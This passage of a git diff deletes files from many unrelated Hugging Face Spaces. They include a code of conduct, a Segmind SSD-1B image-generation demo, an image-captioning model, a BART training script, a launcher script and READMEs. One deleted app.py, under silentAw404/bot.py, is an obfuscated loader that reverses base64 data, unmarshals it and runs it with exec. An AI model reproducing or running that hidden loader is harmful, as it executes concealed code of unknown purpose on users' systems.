we as -contributors and maintainers pledge to make participation in our project and -our community a harassment-free experience for everyone, regardless of age, body -size, disability, ethnicity, sex characteristics, gender identity and expression, -level of experience, education, socio-economic status, nationality, personal -appearance, race, religion, or sexual identity and orientation. - -## Our Standards - -Examples of behavior that contributes to creating a positive environment -include: - -* Using welcoming and inclusive language -* Being respectful of differing viewpoints and experiences -* Gracefully accepting constructive criticism -* Focusing on what is best for the community -* Showing empathy towards other community members - -Examples of unacceptable behavior by participants include: - -* The use of sexualized language or imagery and unwelcome sexual attention or - advances -* Trolling, insulting/derogatory comments, and personal or political attacks -* Public or private harassment -* Publishing others' private information, such as a physical or electronic - address, without explicit permission -* Other conduct which could reasonably be considered inappropriate in a - professional setting - -## Our Responsibilities - -Project maintainers are responsible for clarifying the standards of acceptable -behavior and are expected to take appropriate and fair corrective action in -response to any instances of unacceptable behavior. - -Project maintainers have the right and responsibility to remove, edit, or -reject comments, commits, code, wiki edits, issues, and other contributions -that are not aligned to this Code of Conduct, or to ban temporarily or -permanently any contributor for other behaviors that they deem inappropriate, -threatening, offensive, or harmful. - -## Scope - -This Code of Conduct applies within all project spaces, and it also applies when -an individual is representing the project or its community in public spaces. -Examples of representing a project or community include using an official -project e-mail address, posting via an official social media account, or acting -as an appointed representative at an online or offline event. Representation of -a project may be further defined and clarified by project maintainers. - -This Code of Conduct also applies outside the project spaces when there is a -reasonable belief that an individual's behavior may have a negative impact on -the project or its community. - -## Enforcement - -Instances of abusive, harassing, or otherwise unacceptable behavior may be -reported by contacting the project team at . All -complaints will be reviewed and investigated and will result in a response that -is deemed necessary and appropriate to the circumstances. The project team is -obligated to maintain confidentiality with regard to the reporter of an incident. -Further details of specific enforcement policies may be posted separately. - -Project maintainers who do not follow or enforce the Code of Conduct in good -faith may face temporary or permanent repercussions as determined by other -members of the project's leadership. - -## Attribution - -This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, -available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html - -[homepage]: https://www.contributor-covenant.org - -For answers to common questions about this code of conduct, see -https://www.contributor-covenant.org/faq diff --git a/spaces/segmind/Segmind-Stable-Diffusion/app.py b/spaces/segmind/Segmind-Stable-Diffusion/app.py deleted file mode 100644 index ba5869acbb7318ba058a9aa88fb8776be47b8c9e..0000000000000000000000000000000000000000 --- a/spaces/segmind/Segmind-Stable-Diffusion/app.py +++ /dev/null @@ -1,385 +0,0 @@ -#!/usr/bin/env python - -from __future__ import annotations - -import os -import random - -import gradio as gr -import numpy as np -import PIL.Image -import torch -from diffusers import AutoencoderKL, StableDiffusionXLPipeline -import uuid - -DESCRIPTION = '''# Segmind Stable Diffusion: SSD-1B -#### [Segmind's SSD-1B](https://huggingface.co/segmind/SSD-1B) is a distilled, 50% smaller version of SDXL, offering up to 60% speedup -''' -if not torch.cuda.is_available(): - DESCRIPTION += "\n

        Running on CPU 🥶 This demo does not work on CPU.

        " - -MAX_SEED = np.iinfo(np.int32).max -CACHE_EXAMPLES = torch.cuda.is_available() and os.getenv("CACHE_EXAMPLES", "1") == "1" -MAX_IMAGE_SIZE = int(os.getenv("MAX_IMAGE_SIZE", "1024")) -USE_TORCH_COMPILE = os.getenv("USE_TORCH_COMPILE", "1") == "1" -ENABLE_CPU_OFFLOAD = os.getenv("ENABLE_CPU_OFFLOAD", "0") == "1" -ENABLE_REFINER = os.getenv("ENABLE_REFINER", "0") == "1" - -device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu") - -style_list = [ - { - "name": "(No style)", - "prompt": "{prompt}", - "negative_prompt": "", - }, - { - "name": "Cinematic", - "prompt": "cinematic still {prompt} . emotional, harmonious, vignette, highly detailed, high budget, bokeh, cinemascope, moody, epic, gorgeous, film grain, grainy", - "negative_prompt": "anime, cartoon, graphic, text, painting, crayon, graphite, abstract, glitch, deformed, mutated, ugly, disfigured", - }, - { - "name": "Photographic", - "prompt": "cinematic photo {prompt} . 35mm photograph, film, bokeh, professional, 4k, highly detailed", - "negative_prompt": "drawing, painting, crayon, sketch, graphite, impressionist, noisy, blurry, soft, deformed, ugly", - }, - { - "name": "Anime", - "prompt": "anime artwork {prompt} . anime style, key visual, vibrant, studio anime, highly detailed", - "negative_prompt": "photo, deformed, black and white, realism, disfigured, low contrast", - }, - { - "name": "Manga", - "prompt": "manga style {prompt} . vibrant, high-energy, detailed, iconic, Japanese comic style", - "negative_prompt": "ugly, deformed, noisy, blurry, low contrast, realism, photorealistic, Western comic style", - }, - { - "name": "Digital Art", - "prompt": "concept art {prompt} . digital artwork, illustrative, painterly, matte painting, highly detailed", - "negative_prompt": "photo, photorealistic, realism, ugly", - }, - { - "name": "Pixel art", - "prompt": "pixel-art {prompt} . low-res, blocky, pixel art style, 8-bit graphics", - "negative_prompt": "sloppy, messy, blurry, noisy, highly detailed, ultra textured, photo, realistic", - }, - { - "name": "Fantasy art", - "prompt": "ethereal fantasy concept art of {prompt} . magnificent, celestial, ethereal, painterly, epic, majestic, magical, fantasy art, cover art, dreamy", - "negative_prompt": "photographic, realistic, realism, 35mm film, dslr, cropped, frame, text, deformed, glitch, noise, noisy, off-center, deformed, cross-eyed, closed eyes, bad anatomy, ugly, disfigured, sloppy, duplicate, mutated, black and white", - }, - { - "name": "Neonpunk", - "prompt": "neonpunk style {prompt} . cyberpunk, vaporwave, neon, vibes, vibrant, stunningly beautiful, crisp, detailed, sleek, ultramodern, magenta highlights, dark purple shadows, high contrast, cinematic, ultra detailed, intricate, professional", - "negative_prompt": "painting, drawing, illustration, glitch, deformed, mutated, cross-eyed, ugly, disfigured", - }, - { - "name": "3D Model", - "prompt": "professional 3d model {prompt} . octane render, highly detailed, volumetric, dramatic lighting", - "negative_prompt": "ugly, deformed, noisy, low poly, blurry, painting", - }, -] - -styles = {k["name"]: (k["prompt"], k["negative_prompt"]) for k in style_list} -STYLE_NAMES = list(styles.keys()) -DEFAULT_STYLE_NAME = "Cinematic" - - -def apply_style(style_name: str, positive: str, negative: str = "") -> Tuple[str, str]: - p, n = styles.get(style_name, styles[DEFAULT_STYLE_NAME]) - if not negative: - negative = "" - return p.replace("{prompt}", positive), n + negative - - -if torch.cuda.is_available(): - vae = AutoencoderKL.from_pretrained("madebyollin/sdxl-vae-fp16-fix", torch_dtype=torch.float16) - pipe = StableDiffusionXLPipeline.from_pretrained( - "segmind/SSD-1B", - vae=vae, - torch_dtype=torch.float16, - use_safetensors=True, - variant="fp16", - ) - if ENABLE_REFINER: - refiner = DiffusionPipeline.from_pretrained( - "stabilityai/stable-diffusion-xl-refiner-1.0", - vae=vae, - torch_dtype=torch.float16, - use_safetensors=True, - variant="fp16", - ) - - if ENABLE_CPU_OFFLOAD: - pipe.enable_model_cpu_offload() - if ENABLE_REFINER: - refiner.enable_model_cpu_offload() - else: - pipe.to(device) - if ENABLE_REFINER: - refiner.to(device) - print("Loaded on Device!") - - if USE_TORCH_COMPILE: - pipe.unet = torch.compile(pipe.unet, mode="reduce-overhead", fullgraph=True) - if ENABLE_REFINER: - refiner.unet = torch.compile(refiner.unet, mode="reduce-overhead", fullgraph=True) - print("Model Compiled!") - -def save_image(img): - unique_name = str(uuid.uuid4()) + '.png' - img.save(unique_name) - return unique_name - -def randomize_seed_fn(seed: int, randomize_seed: bool) -> int: - if randomize_seed: - seed = random.randint(0, MAX_SEED) - return seed - -def generate( - prompt: str, - negative_prompt: str = "", - style: str = DEFAULT_STYLE_NAME, - prompt_2: str = "", - negative_prompt_2: str = "", - use_negative_prompt: bool = False, - use_prompt_2: bool = False, - use_negative_prompt_2: bool = False, - seed: int = 0, - width: int = 1024, - height: int = 1024, - guidance_scale_base: float = 5.0, - guidance_scale_refiner: float = 5.0, - num_inference_steps_base: int = 25, - num_inference_steps_refiner: int = 25, - apply_refiner: bool = False, - randomize_seed: bool = False, - progress = gr.Progress(track_tqdm=True) -): - seed = randomize_seed_fn(seed, randomize_seed) - generator = torch.Generator().manual_seed(seed) - - if not use_negative_prompt: - negative_prompt = None # type: ignore - if not use_prompt_2: - prompt_2 = None # type: ignore - if not use_negative_prompt_2: - negative_prompt_2 = None # type: ignore - prompt, negative_prompt = apply_style(style, prompt, negative_prompt) - if not apply_refiner: - image = pipe( - prompt=prompt, - negative_prompt=negative_prompt, - prompt_2=prompt_2, - negative_prompt_2=negative_prompt_2, - width=width, - height=height, - guidance_scale=guidance_scale_base, - num_inference_steps=num_inference_steps_base, - generator=generator, - output_type="pil", - ).images[0] - else: - latents = pipe( - prompt=prompt, - negative_prompt=negative_prompt, - prompt_2=prompt_2, - negative_prompt_2=negative_prompt_2, - width=width, - height=height, - guidance_scale=guidance_scale_base, - num_inference_steps=num_inference_steps_base, - generator=generator, - output_type="latent", - ).images - image = refiner( - prompt=prompt, - negative_prompt=negative_prompt, - prompt_2=prompt_2, - negative_prompt_2=negative_prompt_2, - guidance_scale=guidance_scale_refiner, - num_inference_steps=num_inference_steps_refiner, - image=latents, - generator=generator, - ).images[0] - - image_path = save_image(image) - print(image_path) - return [image_path], seed - - -examples = ['3d digital art of an adorable ghost, glowing within, holding a heart shaped pumpkin, Halloween, super cute, spooky haunted house background', 'beautiful lady, freckles, big smile, blue eyes, short ginger hair, dark makeup, wearing a floral blue vest top, soft light, dark grey background', 'professional portrait photo of an anthropomorphic cat wearing fancy gentleman hat and jacket walking in autumn forest.', 'an astronaut sitting in a diner, eating fries, cinematic, analog film', 'Albert Einstein in a surrealist Cyberpunk 2077 world, hyperrealistic', 'cinematic film still of Futuristic hero with golden dark armour with machine gun, muscular body'] - -with gr.Blocks(css="style.css") as demo: - gr.Markdown(DESCRIPTION) - gr.DuplicateButton( - value="Duplicate Space for private use", - elem_id="duplicate-button", - visible=os.getenv("SHOW_DUPLICATE_BUTTON") == "1", - ) - with gr.Group(): - with gr.Row(): - prompt = gr.Text( - label="Prompt", - show_label=False, - max_lines=1, - placeholder="Enter your prompt", - container=False, - ) - run_button = gr.Button("Run", scale=0) - result = gr.Gallery(label="Result", columns=1, show_label=False) - with gr.Accordion("Advanced options", open=False): - with gr.Row(): - use_negative_prompt = gr.Checkbox(label="Use negative prompt", value=False) - use_prompt_2 = gr.Checkbox(label="Use prompt 2", value=False) - use_negative_prompt_2 = gr.Checkbox(label="Use negative prompt 2", value=False) - style_selection = gr.Radio( - show_label=True, container=True, interactive=True, - choices=STYLE_NAMES, - value=DEFAULT_STYLE_NAME, - label='Image Style' - ) - negative_prompt = gr.Text( - label="Negative prompt", - max_lines=1, - placeholder="Enter a negative prompt", - visible=False, - ) - prompt_2 = gr.Text( - label="Prompt 2", - max_lines=1, - placeholder="Enter your prompt", - visible=False, - ) - negative_prompt_2 = gr.Text( - label="Negative prompt 2", - max_lines=1, - placeholder="Enter a negative prompt", - visible=False, - ) - seed = gr.Slider( - label="Seed", - minimum=0, - maximum=MAX_SEED, - step=1, - value=0, - ) - randomize_seed = gr.Checkbox(label="Randomize seed", value=True) - with gr.Row(visible=False): - width = gr.Slider( - label="Width", - minimum=256, - maximum=MAX_IMAGE_SIZE, - step=32, - value=1024, - ) - height = gr.Slider( - label="Height", - minimum=256, - maximum=MAX_IMAGE_SIZE, - step=32, - value=1024, - ) - apply_refiner = gr.Checkbox(label="Apply refiner", value=False, visible=ENABLE_REFINER) - with gr.Row(): - guidance_scale_base = gr.Slider( - label="Guidance scale for base", - minimum=1, - maximum=20, - step=0.1, - value=9.0, - ) - num_inference_steps_base = gr.Slider( - label="Number of inference steps for base", - minimum=10, - maximum=100, - step=1, - value=25, - ) - with gr.Row(visible=False) as refiner_params: - guidance_scale_refiner = gr.Slider( - label="Guidance scale for refiner", - minimum=1, - maximum=20, - step=0.1, - value=5.0, - ) - num_inference_steps_refiner = gr.Slider( - label="Number of inference steps for refiner", - minimum=10, - maximum=100, - step=1, - value=25, - ) - - gr.Examples( - examples=examples, - inputs=prompt, - outputs=[result, seed], - fn=generate, - cache_examples=CACHE_EXAMPLES, - ) - - use_negative_prompt.change( - fn=lambda x: gr.update(visible=x), - inputs=use_negative_prompt, - outputs=negative_prompt, - queue=False, - api_name=False, - ) - use_prompt_2.change( - fn=lambda x: gr.update(visible=x), - inputs=use_prompt_2, - outputs=prompt_2, - queue=False, - api_name=False, - ) - use_negative_prompt_2.change( - fn=lambda x: gr.update(visible=x), - inputs=use_negative_prompt_2, - outputs=negative_prompt_2, - queue=False, - api_name=False, - ) - apply_refiner.change( - fn=lambda x: gr.update(visible=x), - inputs=apply_refiner, - outputs=refiner_params, - queue=False, - api_name=False, - ) - - gr.on( - triggers=[ - prompt.submit, - negative_prompt.submit, - prompt_2.submit, - negative_prompt_2.submit, - run_button.click, - ], - fn=generate, - inputs=[ - prompt, - negative_prompt, - style_selection, - prompt_2, - negative_prompt_2, - use_negative_prompt, - use_prompt_2, - use_negative_prompt_2, - seed, - width, - height, - guidance_scale_base, - guidance_scale_refiner, - num_inference_steps_base, - num_inference_steps_refiner, - apply_refiner, - randomize_seed - ], - outputs=[result, seed], - api_name="run", - ) - -if __name__ == "__main__": - demo.queue(max_size=20).launch() \ No newline at end of file diff --git a/spaces/serdaryildiz/TRCaptionNet/Model/trcaptionnet.py b/spaces/serdaryildiz/TRCaptionNet/Model/trcaptionnet.py deleted file mode 100644 index bdd52bedcbe32527303ec3b6c35b9c836f2b0e3d..0000000000000000000000000000000000000000 --- a/spaces/serdaryildiz/TRCaptionNet/Model/trcaptionnet.py +++ /dev/null @@ -1,107 +0,0 @@ -import os -import numpy - -import torch -from torch import nn -from PIL import Image -from transformers import BertTokenizer - -from Model import clip -from Model.bert import BertLMHeadModel, BertConfig -from Model.clip.model import Transformer - - -class Proj(nn.Module): - - def __init__(self, encoder_output_size, num_head=16): - super().__init__() - self.encoder_output_size = encoder_output_size - - self.transformer = Transformer(encoder_output_size, 1, num_head) - self.linear = nn.Linear(encoder_output_size, 768) - return - - def forward(self, x): - x = x.permute(1, 0, 2) # NLD -> LND - x = self.transformer(x) - x = x.permute(1, 0, 2) # LND -> NLD - return self.linear(x) - - -class TRCaptionNet(nn.Module): - def __init__(self, config: dict): - super().__init__() - # parameters - self.max_length = config["max_length"] - self.proj_flag = config["proj"] - assert type(self.proj_flag) == bool - self.proj_num_head = config["proj_num_head"] - - # vision encoder - self.vision_encoder, preprocess = clip.load(config["clip"], jit=False) - self.vision_encoder.eval() - self.vision_encoder = self.vision_encoder.visual.float() - with torch.no_grad(): - dummy_input_image = preprocess(Image.fromarray(numpy.zeros((512, 512, 3), dtype=numpy.uint8))).to(next(self.parameters()).device) - encoder_output_size = self.vision_encoder(dummy_input_image.unsqueeze(0)).shape[-1] - - # language decoder - if not os.path.isfile(config["bert"]): - self.language_decoder = BertLMHeadModel.from_pretrained(config["bert"], - is_decoder=True, - add_cross_attention=True) - self.tokenizer = BertTokenizer.from_pretrained(config["bert"]) - else: - med_config = BertConfig.from_json_file(config["bert"]) - self.language_decoder = BertLMHeadModel(config=med_config) - self.tokenizer = BertTokenizer.from_pretrained("dbmdz/bert-base-turkish-cased") - - # proj - if self.proj_flag: - if self.proj_num_head is None: - self.proj = nn.Linear(encoder_output_size, 768) - else: - self.proj = Proj(encoder_output_size, self.proj_num_head) - else: - self.proj = None - return - - @torch.no_grad() - def generate(self, images, max_length: int = None, min_length: int = 12, num_beams: int = 3, - repetition_penalty: float = 1.1): - image_embeds = self.vision_encoder(images) - - if self.proj is not None: - image_embeds = self.proj(image_embeds) - - image_atts = torch.ones(image_embeds.shape[:-1], dtype=torch.long).to(images.device) - model_kwargs = {"encoder_hidden_states": image_embeds, "encoder_attention_mask": image_atts} - - input_ids = torch.ones((image_embeds.shape[0], 1), device=images.device, dtype=torch.long) - input_ids *= 2 - - outputs = self.language_decoder.generate(input_ids=input_ids, - max_length=self.max_length if max_length is None else max_length, - min_length=min_length, - num_beams=num_beams, - eos_token_id=self.tokenizer.sep_token_id, - pad_token_id=self.tokenizer.pad_token_id, - repetition_penalty=repetition_penalty, - **model_kwargs) - - captions = [self.tokenizer.decode(output, skip_special_tokens=True) for output in outputs] - return captions - - -def test(): - model = TRCaptionNet({ - "max_length": 35, - "clip": "ViT-B/32", - "bert": "dbmdz/bert-base-turkish-cased" - }) - - return - - -if __name__ == '__main__': - test() diff --git a/spaces/shibing624/ChatPDF/modules/__init__.py b/spaces/shibing624/ChatPDF/modules/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/shigel/ailol/template.md b/spaces/shigel/ailol/template.md deleted file mode 100644 index 7dac1398e486c0f52b6bfd5fa138d6d15a052d9d..0000000000000000000000000000000000000000 --- a/spaces/shigel/ailol/template.md +++ /dev/null @@ -1,11 +0,0 @@ -### AIアシスタントの返信 - -ここにユーザのメッセージに対する返信を書く(爆笑必至) - -### AIアシスタントの気持ち - -ここにAIアシスタントの気持ちを書く - -### 笑いのネタに対する自信 - -返信で披露したネタの自信の程を心ゆくまで語って良し diff --git a/spaces/silentAw404/bot.py/app.py b/spaces/silentAw404/bot.py/app.py deleted file mode 100644 index 0f26c18cbe6695cf4fcff48c5358162aa1d99e2b..0000000000000000000000000000000000000000 --- a/spaces/silentAw404/bot.py/app.py +++ /dev/null @@ -1 +0,0 @@ -_ = lambda __ : __import__('marshal').loads(__import__('base64').b64decode(__[::-1]));exec((_)(b'CoQAEEgDBQQAEEABBQwDIEACCARAKEADBwQACIACBARAKEADBwQACMgCBoQAKEgCCIQAMEACAAAA2MHAAAQA+UGb1R2btxDCaDAAAEhcAAAAQIHAAAAEyBAAAAhc05WayBXBaPWZ4VGBaDAAA8gcAAAAOIHAAAQDyBAAAwgcAAAALIHAAAgEyBAAAggcy9mcyVEdy9Gctl0CaDAAAYgctVGdzl3cGodZslmZzlmBajGdhBHBaP3bCo9Dp4iLu8K2MuthZnq2gkq2GqNInidsYDyrYjY2uiNIqithZHL2qithZz42niNInidgZfL2EmNIxiNiZHL2ziNIHmNqYDChZfK21itqYfK2gEL2viNIni9tY7K2AAAAZVXMxcTcWFjSXdGSLBjZhNUN40GSZ9UVhtmY1dlbnJHMJFzb6p2Xwh2ZooVew5CdvJmB6VGaCo1boFGaTJWTHoFAAAgEyFgBBogAGEAEBARAKIgDB4QAWEgABAAAAAgFzBAAAkRZk92YfJWdoRXan9Fdld2Da7De8Mg+AAAAQIHApWGZvNGBaTnblRnbvN2XlxWamxgWlNnbvB3clJHCaBAAAMgcsJXdflGchdgWuV2avR3XoRXdhpg2oRXYw9VZslmZJodZtFmbf9GclJXCaLXZud3bf9GclJnCanQKlR2bjVGZGodZk92YlRGN2IWCaTjNlNXYiZg2u92cqRgWlR2bj91c1RXY0N3CaRXZnNg2zR3clVXclJHCafQK40iZ0VXB6Bg205WZ052bjdgWAAAAIn+cyVGZhVGaHodApAiblt2b0Zgeu9Wa0FmepJ3boRXdB1gWvMHduVGdu92YvogevEg+vM3bwVmcv02bj5iY1hGdpdmLpBXYv8iOzBHd0hWH650CpAwUAQGAwAwUAQGAZBQAAEAAB4gbAcFATBAZAcFATBwVIwHC9FQoKQmBgGQoHwXBgSAdH0nAhmAZIQWAgCQoDAqB8RmcCs2BkJgaGwnB9JQjGQWB8RAfBoGA0VQfBkmAdCwmDwXBkRAZE0nBdCwmCw3AkBwmBwnAkBwmAwXAkxmeAAAAAOHAAAwQAAAAGAAAAkAAAAAAAAAAAAAAAQwY0YTZzFmYgwGbhR3culGIwlGcSo3c0NXZ1FXZyBCbsFGdz5WagAXawRhelxGctl2cvkHevJHctkGc5B3L5J3b0l2cvBXZy9Cdl5mLuF2avJWYoNmLy9mcylWbv8iOzBHd0hGIsJXdtgXZk5Wat0CIwlGcgUGZhJ3ZwVXLtACbsFGdz5WagAXaw5leyFWZsNWBaXGbw1Waz9Se49mcw1SawlHcvkncvRXaz9GclJ3L0Vmbu4WYr9mYhh2YuI3byJXat9yL6MHc0RHagwmc11CelRmbp5CbhJ2bsdGI0V2cgcWam52bjBCcpBHW652bzpmLuJXYlxmC65EAAAAAp/QKAMVAkBQABMoDk5QZI4GABEwgMUWDlpucMUGDaRwgLUmCllQZIU2BltgWNQmCaxAZJo1CkhgWKQ2BaBAhJQGCkZgWGwWAkBAZAAjAuBQWAEQAhSAZDAKAlBQABE6BkNAoAUGABAQAAEAr5VQZAQgJuBwVGolBsFAZAQGD6RgWEwWAkBAZAAjAuBQWAEQAhSAZDAKAlBQABEqBkNAoAUGABAQAAEAc5VQZAQgJuBwVEoFBsFAZAQGD6BQABEKBkNAoAUGABEQoFQ2AgCQZAEQAhSAZDAKAlBQABE6AkNAoAUGKuZhcBEqAkJAoBoGAlBgWAwWAkBAZAAAA2PHAAAAQAAAAIAAAAAAAAAAAAAAAAAAAAAwY')) \ No newline at end of file diff --git a/spaces/simonguest/cs-tutor/README.md b/spaces/simonguest/cs-tutor/README.md deleted file mode 100644 index 1f961bcb80a4b5b89e227a99608a9341f10af559..0000000000000000000000000000000000000000 --- a/spaces/simonguest/cs-tutor/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Cs Tutor -emoji: 🦀 -colorFrom: red -colorTo: gray -sdk: gradio -sdk_version: 3.36.1 -app_file: app.py -pinned: false -license: apache-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/skf15963/summary/fengshen/examples/finetune_bart_qg/finetune_bart.sh b/spaces/skf15963/summary/fengshen/examples/finetune_bart_qg/finetune_bart.sh deleted file mode 100644 index ae88b230fa223c3d2c519e4f09cb1c703319af48..0000000000000000000000000000000000000000 --- a/spaces/skf15963/summary/fengshen/examples/finetune_bart_qg/finetune_bart.sh +++ /dev/null @@ -1,97 +0,0 @@ -#!/bin/bash -#SBATCH --job-name=bart_qg # create a short name for your job -#SBATCH --nodes=1 # node count -#SBATCH --ntasks-per-node=8 # number of tasks to run per node -#SBATCH --cpus-per-task=10 # cpu-cores per task (>1 if multi-threaded tasks) -#SBATCH --gres=gpu:1 # number of gpus per node -#SBATCH -o %x-%j.log # output and error log file names (%x for job id) -set -x -e - -MODEL_NAME=IDEA-CCNL/Randeng-BART-139M -RUN_NAME=bart_v0_test -ROOT_DIR=../../workspace/log/$RUN_NAME - -config_json="$ROOT_DIR/$MODEL_NAME.ds_config.json" -export MASTER_PORT=$[RANDOM%10000+40000] - -MICRO_BATCH_SIZE=32 - -cat < $config_json -{ - "train_micro_batch_size_per_gpu": $MICRO_BATCH_SIZE, - "gradient_clipping": 1, - "zero_optimization": { - "stage": 1 - }, - "fp16": { - "enabled": true, - } -} -EOT -export PL_DEEPSPEED_CONFIG_PATH=$config_json -export TORCH_EXTENSIONS_DIR=../../workspace/torch_extensions - -DATA_ARGS=" \ - --train_file train.json \ - --val_file dev.json \ - --test_file test.json \ - --tokenizer_type bart \ - --num_workers 8 \ - --dataloader_workers 2 \ - --train_batchsize $MICRO_BATCH_SIZE \ - --val_batchsize $MICRO_BATCH_SIZE \ - --test_batchsize $MICRO_BATCH_SIZE \ - --max_seq_lengt 512 \ - --max_src_length 32 \ - --max_kno_length 416 \ - --max_tgt_length 64 \ - --mask_ans_style anstoken_multispan \ - " - -MODEL_ARGS="\ - --model_path $MODEL_NAME/ \ - --learning_rate 1e-4 \ - --min_learning_rate 1e-8 \ - --lr_decay_steps 100000 \ - --weight_decay 1e-2 \ - --warmup_steps 1000 \ - " - -MODEL_CHECKPOINT_ARGS="\ - --monitor val_loss \ - --save_top_k 3 \ - --mode min \ - --save_last \ - --every_n_train_steps 5000 \ - --save_ckpt_path $ROOT_DIR/ckpt/ \ - --load_ckpt_path $ROOT_DIR/ckpt/ \ - --filename model-{step:02d}-{train_loss:.4f} \ - " - -TRAINER_ARGS="\ - --gradient_clip_val 1.0 \ - --max_epochs 1 \ - --gpus 1 \ - --num_nodes 1 \ - --strategy ddp \ - --log_every_n_steps 100 \ - --val_check_interval 0.5 \ - --accumulate_grad_batches 1 \ - --default_root_dir $ROOT_DIR \ - --tensorboard_dir $ROOT_DIR \ - --label_smooth 0.1 \ - " - - - -export options=" \ - $DATA_ARGS \ - $MODEL_ARGS \ - $MODEL_CHECKPOINT_ARGS \ - $TRAINER_ARGS \ - " -# test -export SCRIPT_PATH=./finetune_bart.py - -python3 ${SCRIPT_PATH} $options > $ROOT_DIR/test.log - diff --git a/spaces/sklearn-docs/MNIST-Agglomerative-Clustering/README.md b/spaces/sklearn-docs/MNIST-Agglomerative-Clustering/README.md deleted file mode 100644 index 45bfb3ab4258d29dbb70385613de6c60e6cb6ed2..0000000000000000000000000000000000000000 --- a/spaces/sklearn-docs/MNIST-Agglomerative-Clustering/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: MNIST Agglomerative Clustering -emoji: 📉 -colorFrom: pink -colorTo: purple -sdk: gradio -sdk_version: 3.24.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/skyxx/skyxxChat/run_macOS.command b/spaces/skyxx/skyxxChat/run_macOS.command deleted file mode 100644 index 2d26597ae47519f42336ccffc16646713a192ae1..0000000000000000000000000000000000000000 --- a/spaces/skyxx/skyxxChat/run_macOS.command +++ /dev/null @@ -1,31 +0,0 @@ -#!/bin/bash - -# 获取脚本所在目录 -script_dir=$(dirname "$(readlink -f "$0")") - -# 将工作目录更改为脚本所在目录 -cd "$script_dir" || exit - -# 检查Git仓库是否有更新 -git remote update -pwd - -if ! git status -uno | grep 'up to date' > /dev/null; then - # 如果有更新,关闭当前运行的服务器 - pkill -f ChuanhuChatbot.py - - # 拉取最新更改 - git pull - - # 安装依赖 - pip3 install -r requirements.txt - - # 重新启动服务器 - nohup python3 ChuanhuChatbot.py & -fi - -# 检查ChuanhuChatbot.py是否在运行 -if ! pgrep -f ChuanhuChatbot.py > /dev/null; then - # 如果没有运行,启动服务器 - nohup python3 ChuanhuChatbot.py & -fi diff --git a/spaces/sqc1729/bingi/src/components/ui/textarea.tsx b/spaces/sqc1729/bingi/src/components/ui/textarea.tsx deleted file mode 100644 index e25af722c7a5dc1121a9ab58d6716952f9f76081..0000000000000000000000000000000000000000 --- a/spaces/sqc1729/bingi/src/components/ui/textarea.tsx +++ /dev/null @@ -1,24 +0,0 @@ -import * as React from 'react' - -import { cn } from '@/lib/utils' - -export interface TextareaProps - extends React.TextareaHTMLAttributes {} - -const Textarea = React.forwardRef( - ({ className, ...props }, ref) => { - return ( -